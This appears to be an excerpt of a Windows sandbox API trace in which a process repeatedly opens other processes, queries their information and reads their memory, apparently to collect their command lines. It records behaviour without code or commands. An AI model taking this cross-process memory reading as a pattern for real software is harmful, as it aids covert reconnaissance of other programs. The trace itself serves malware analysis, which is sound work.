[0405.202] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.202] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.230] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x938) returned 0x240
[0405.230] GetLastError () returned 0x0
[0405.230] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.230] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.230] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.231] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x372930, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.231] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3726fa, lpBuffer=0x12dd100, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.232] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.233] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.233] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x371ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] malloc (_Size=0x74) returned 0x2c4740
[0405.234] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x372766, lpBuffer=0x2c4740, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.234] free (_Block=0x2c4740)
[0405.235] CloseHandle (hObject=0x240) returned 1
[0405.236] _ui64tow (_Value=0x95c, _Buffer="2360", _Radix=10) returned="2396"
[0405.242] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2396") returned 4
[0405.243] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.243] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.267] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x240
[0405.267] GetLastError () returned 0x0
[0405.267] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.267] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a2950, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.268] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a26f6, lpBuffer=0x12dd100, nSize=0x74, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.269] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.270] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.270] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.270] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.271] malloc (_Size=0x7c) returned 0x2c4740
[0405.271] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5a276a, lpBuffer=0x2c4740, nSize=0x7a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.271] free (_Block=0x2c4740)
[0405.272] CloseHandle (hObject=0x240) returned 1
[0405.273] _ui64tow (_Value=0x970, _Buffer="2396", _Radix=10) returned="2416"
[0405.277] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2416") returned 4
[0405.278] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.278] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.302] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x970) returned 0x240
[0405.302] GetLastError () returned 0x0
[0405.302] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1728e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1726e0, lpBuffer=0x12dd100, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.304] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.305] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.305] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x171ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] malloc (_Size=0x62) returned 0x2c0800
[0405.306] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x17273a, lpBuffer=0x2c0800, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.306] free (_Block=0x2c0800)
[0405.307] CloseHandle (hObject=0x240) returned 1
[0405.308] _ui64tow (_Value=0x96c, _Buffer="2416", _Radix=10) returned="2412"
[0405.316] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2412") returned 4
[0405.318] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.318] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.340] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x240
[0405.340] GetLastError () returned 0x0
[0405.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.340] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x422900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.341] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4226ee, lpBuffer=0x12dd100, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.342] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.343] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.343] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x421ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] malloc (_Size=0x68) returned 0x2c08e0
[0405.344] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x42274e, lpBuffer=0x2c08e0, nSize=0x66, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c08e0*, lpNumberOfBytesRead=0x0) returned 1
[0405.344] free (_Block=0x2c08e0)
[0405.345] CloseHandle (hObject=0x240) returned 1
[0405.346] _ui64tow (_Value=0x958, _Buffer="2412", _Radix=10) returned="2392"
[0405.352] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2392") returned 4
[0405.353] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.353] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.380] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x958) returned 0x240
[0405.380] GetLastError () returned 0x0
[0405.380] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.380] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b28f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.381] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b26e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.382] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.383] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] malloc (_Size=0x64) returned 0x2c0800
[0405.384] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4b2740, lpBuffer=0x2c0800, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.384] free (_Block=0x2c0800)
[0405.385] CloseHandle (hObject=0x240) returned 1
[0405.386] _ui64tow (_Value=0xaa8, _Buffer="2392", _Radix=10) returned="2728"
[0405.391] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2728") returned 4
[0405.392] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.392] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.416] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaa8) returned 0x240
[0405.416] GetLastError () returned 0x0
[0405.416] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.416] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x192900, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.417] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1926e4, lpBuffer=0x12dd100, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.418] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.419] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.419] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x191ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] malloc (_Size=0x6a) returned 0x2c4740
[0405.420] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x192746, lpBuffer=0x2c4740, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0405.420] free (_Block=0x2c4740)
[0405.421] CloseHandle (hObject=0x240) returned 1
[0405.422] _ui64tow (_Value=0xab4, _Buffer="2728", _Radix=10) returned="2740"
[0405.435] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2740") returned 4
[0405.436] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.436] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.463] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xab4) returned 0x240
[0405.463] GetLastError () returned 0x0
[0405.463] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.463] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.463] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.464] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5728f0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.464] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x5726e4, lpBuffer=0x12dd100, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.465] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.466] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.466] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x571ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] malloc (_Size=0x64) returned 0x2c0800
[0405.467] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x572740, lpBuffer=0x2c0800, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.467] free (_Block=0x2c0800)
[0405.468] CloseHandle (hObject=0x240) returned 1
[0405.469] _ui64tow (_Value=0xabc, _Buffer="2740", _Radix=10) returned="2748"
[0405.474] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2748") returned 4
[0405.476] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0405.476] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0405.498] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x240
[0405.499] GetLastError () returned 0x0
[0405.499] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0405.499] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4128c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.500] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x4126da, lpBuffer=0x12dd100, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0405.501] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0405.502] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0405.502] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7efdf020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0405.502] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x411ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0405.503] malloc (_Size=0x5a) returned 0x2c0800
[0405.503] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x41272c, lpBuffer=0x2c0800, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c0800*, lpNumberOfBytesRead=0x0) returned 1
[0405.503] free (_Block=0x2c0800)
[0405.504] CloseHandle (hObject=0x240) returned 1
[0405.505] _ui64tow (_Value=0xac4, _Buffer="2748", _Radix=10) returned="2756"
[0405.509] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2756") returned 4
[0405.511] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
